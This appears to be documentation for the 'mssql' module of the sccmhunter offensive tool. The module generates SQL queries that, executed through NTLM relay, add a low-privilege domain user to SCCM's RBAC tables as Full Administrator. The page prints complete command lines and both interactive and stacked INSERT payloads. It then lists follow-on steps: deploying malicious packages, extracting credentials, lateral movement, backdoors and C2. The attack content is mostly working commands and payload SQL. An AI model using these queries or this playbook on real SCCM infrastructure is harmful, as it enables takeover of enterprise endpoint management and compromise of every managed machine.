Skip to main content
The mssql module generates SQL queries designed for use in NTLM relay attacks against SCCM site databases. By executing these queries against the SCCM database, attackers can elevate domain users to SCCM administrative roles, effectively granting full control over the SCCM infrastructure.
This module generates SQL queries for privilege escalation. The queries must be executed through NTLM relay attacks or direct database access. This represents a critical privilege escalation vector in SCCM environments.

Attack Overview

The MSSQL privilege escalation attack works by:
  1. User SID Resolution: Converting the target username to its corresponding SID
  2. Query Generation: Creating SQL statements to add the user to SCCM administrative roles
  3. Role Assignment: Granting Full Administrator permissions with appropriate scope access
  4. RBAC Configuration: Setting up Role-Based Access Control permissions
This attack leverages SCCM’s Role-Based Access Control (RBAC) system to grant administrative privileges. The generated queries can be used in NTLM relay attacks against SQL servers hosting SCCM databases.

SCCM Role-Based Access Control

Understanding SCCM RBAC

SCCM uses a sophisticated RBAC system with three key components:
  • Administrative Users: Users or groups with SCCM permissions
  • Security Roles: Predefined permission sets (Full Administrator, etc.)
  • Security Scopes: Define what objects the user can manage

Prerequisites

Requirements

  • Valid Active Directory credentials for SID resolution
  • Target user account to elevate privileges for
  • SCCM site code for the target environment
  • NTLM relay capability against SCCM SQL servers
  • Network access to domain controller for SID resolution

Command Syntax

python3 sccmhunter.py mssql [OPTIONS]

Parameters

ParameterDescriptionExample
-dTarget domain nameinternal.lab
-dc-ipDomain controller IP or FQDN10.10.100.100
-tuTarget user to grant SCCM admin privilegeslowpriv
-scSCCM site code for privilege assignmentLAB
ParameterDescriptionExample
-uUsername for authenticationadministrator
-pPassword for authenticationP@ssw0rd
-hashesNT:LM hash for authenticationaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76
-kUse Kerberos authentication
-no-passDon’t prompt for password
-aesAES key for Kerberos (128/256 bits)
-ldapsUse LDAPS instead of LDAP
ParameterDescriptionUse Case
-stackedGenerate single stacked queryNTLM relay attacks requiring single query execution
-debugEnable verbose loggingTroubleshooting and detailed output
The -stacked flag combines all privilege escalation queries into a single SQL statement, which is essential for NTLM relay attacks that only allow one query execution.

Usage Examples

Generate separate SQL queries for manual execution or multi-step NTLM relay attacks
python3 sccmhunter.py mssql -u administrator -p P@ssw0rd -d internal.lab -dc-ip 10.10.100.100 -tu lowpriv -sc LAB
Expected Output:
[22:52:14] INFO     [*] Resolving lowpriv SID...
[22:52:14] INFO     [*] Converted lowpriv SID to 0x0105000000000005150000005407A9EE65B1F9B01FFF385E59040000
[22:52:14] INFO     [*] Use the following to add lowpriv as a Site Server Admin.

use CM_LAB
INSERT INTO RBAC_Admins (AdminSID,LogonName,IsGroup,IsDeleted,CreatedBy,CreatedDate,ModifiedBy,ModifiedDate,SourceSite)
VALUES (0x0105000000000005150000005407A9EE65B1F9B01FFF385E59040000,'LAB\lowpriv',0,0,'','','','','LAB');
SELECT AdminID,LogonName FROM RBAC_Admins;

[*] Enter AdminID:12345

INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (12345,'SMS0001R','SMS00ALL','29');
INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (12345,'SMS0001R','SMS00001','1');
INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (12345,'SMS0001R','SMS00004','1');
Individual queries require interactive input to provide the AdminID returned from the first query. This approach is useful for manual SQL execution or when you have interactive access to the database.
Generate a single SQL statement combining all privilege escalation steps
python3 sccmhunter.py mssql -u administrator -p P@ssw0rd -d internal.lab -dc-ip 10.10.100.100 -tu lowpriv -sc LAB -stacked
Expected Output:
[22:55:05] INFO     [*] Resolving lowpriv SID...
[22:55:05] INFO     [*] Converted lowpriv SID to 0x0105000000000005150000005407A9EE65B1F9B01FFF385E59040000
[22:55:05] INFO     [*] Use the following to add lowpriv as a Site Server Admin.

USE CM_LAB;
INSERT INTO RBAC_Admins (AdminSID,LogonName,IsGroup,IsDeleted,CreatedBy,CreatedDate,ModifiedBy,ModifiedDate,SourceSite)
VALUES (0x0105000000000005150000005407A9EE65B1F9B01FFF385E59040000,'LAB\lowpriv',0,0,'','','','','LAB');
INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID)
VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'LAB\lowpriv'),'SMS0001R','SMS00ALL','29');
INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID)
VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'LAB\lowpriv'),'SMS0001R','SMS00001','1');
INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID)
VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'LAB\lowpriv'),'SMS0001R','SMS00004','1');
The stacked query approach is essential for NTLM relay attacks where only one SQL command can be executed. It uses subqueries to automatically retrieve the AdminID, eliminating the need for interactive input.

Understanding the SQL Queries

RBAC Database Tables

The generated queries modify three key SCCM database tables:
  • RBAC_Admins: Stores administrative users and their basic information
  • RBAC_ExtendedPermissions: Links admins to roles and scopes
  • Site-specific scope assignments: Grants access to different SCCM objects
1. RBAC_Admins Table Insert
  • Adds the target user as an SCCM administrative user
  • Converts domain\username format for SCCM compatibility
  • Uses the resolved SID for proper identification
2. RBAC_ExtendedPermissions Assignments
  • SMS0001R: Full Administrator role (highest privileges)
  • SMS00ALL: All Systems scope (access to all objects)
  • SMS00001: All Systems Collection scope
  • SMS00004: Default scope for collections
3. Role and Scope Combinations
  • Each permission links an admin to a role within a specific scope
  • Multiple scopes ensure comprehensive access across the SCCM environment

Attack Integration

NTLM Relay Prerequisites

Required for Attack Success:
  • SMB signing disabled on SQL servers
  • SCCM SQL server accessible via NTLM
  • Account with NTLM relay capability
  • Network position for man-in-the-middle attacks

Post-Exploitation Benefits

Gained Capabilities:
  • Full SCCM administrative access
  • Software deployment to all systems
  • Operating system deployment control
  • Access to all SCCM credentials and secrets

Verification and Testing

After Query Execution:
  1. Log into SCCM console with elevated account
  2. Verify administrative role assignment in RBAC settings
  3. Test software deployment capabilities
  4. Confirm access to administrative functions
SCCM Console Access:
  • Navigate to Administration > Security > Administrative Users
  • Verify the target user appears with Full Administrator role
  • Test creating and deploying applications or task sequences

Next Steps

SCCM Administration

Leverage Full Access:
  • Deploy malicious software packages
  • Extract additional credentials
  • Lateral movement via client push
  • Operating system deployment abuse

DPAPI Extraction

Use SCCM admin access to extract secrets from client systems

Persistence

Maintain Access:
  • Create additional admin accounts
  • Deploy persistent backdoors
  • Establish C2 infrastructure
  • Document infrastructure for future access